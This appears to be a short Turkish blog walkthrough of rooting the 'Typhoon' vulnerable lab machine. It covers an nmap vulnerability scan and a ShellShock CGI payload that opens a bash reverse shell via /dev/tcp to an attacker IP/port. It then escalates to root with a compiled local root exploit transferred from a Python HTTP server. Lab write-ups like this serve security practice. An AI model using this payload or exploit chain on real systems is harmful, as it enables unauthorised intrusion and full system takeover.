Typhoon Vulnerable Machine ShellShock Zaafiyeti

typhoon

Merhabalar,

Bugün Typhoon Makinesindeki ShellShock Açıgını Kullanacağız.

Makinemiz üzerinde keşif için Ağ taramasına başlıyoruz.

nmap -sV --script=vuln

komutunu vererek kısa yoldan zaafiyetleri keşfetmeyi deniyorum.

Nmap Taramasında /cgi-bin/test.sh URL’si ve ShellShock Zaafiyeti oldugu gözümüze çarpıyor.(SS Almayı Unuttum)

Burp Suite’imizi Açıyoruz.

URL’imizi Proxy ile yakaladıktan sonra Repeater Sekmemize Atıyoruz.

Reverse Shellimiz için Payloadımızı hazırlıyoruz.

{} { :;}; echo; /bin/bash -i >& /dev/tcp/$İP&PORT 0>&1

TCP portu ile reverse shellimizi elde ettik.

uid komutunu verdigimizde www@data grup kullanıcısında oldugumuzu görüyoruz.

Uname -a Komutunu verdigimizde Makinemizin Linux 3.13.0-32 Sürümlü Ubuntu dagıtımı oldugunu ögreniyoruz.

Priv Escelation için arayışa girdigimizde 37292.c localroot Exploitiyle Karşılaşıyoruz.

Zaafiyetli Makinede bir sorundan dolayı exploiti Kendi Makinede Derleyerek Simple Server Üzerinden Aktarmak zorunda kaldım.

python -m SimpleHTTPServer 9000

Exploitimiz Çalıştı Makinemizde Başarılı Bir Şekilde Root Olduk Makine Üzerinde Birçok Zaafiyet İçinden Bence En kolay olanı ShellShock Digerlerinide Yazacagım Okudugunuz için Teşekkürler.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir